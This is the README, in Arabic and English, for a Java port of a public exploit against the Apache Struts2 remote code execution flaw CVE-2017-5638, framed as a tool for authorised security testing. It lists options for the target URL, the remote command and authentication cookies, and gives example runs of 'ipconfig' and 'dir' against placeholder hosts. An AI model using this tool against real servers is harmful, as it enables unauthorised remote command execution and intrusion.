
# استغلال قائم على Java لثغرة Apache Struts2 CVE-2017-5638، ينفذ أوامر عشوائية عبر ترويسات HTTP مصممة خصيصًا. مخصص لتقييمات الأمان المصرح بها.
هذا نوع من التحويل إلى Java لاستغلال Python الموجود في: https://www.exploit-db.com/exploits/41570/.
هذا البرنامج مكتوب بحيث لا يحتوي على أي تبعيات خارجية.
هذه الأداة مخصّصة لمهندسي الأمن ومتخصصي أمن التطبيقات (AppSec) لإجراء تقييمات أمنية. يرجى استخدام هذه الأداة بمسؤولية. لا أتحمل المسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق. لست مسؤولاً عن أي أضرار ناتجة أو أي جرائم تُرتكب باستخدام هذه الأداة.
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE.txt للحصول على التفاصيل.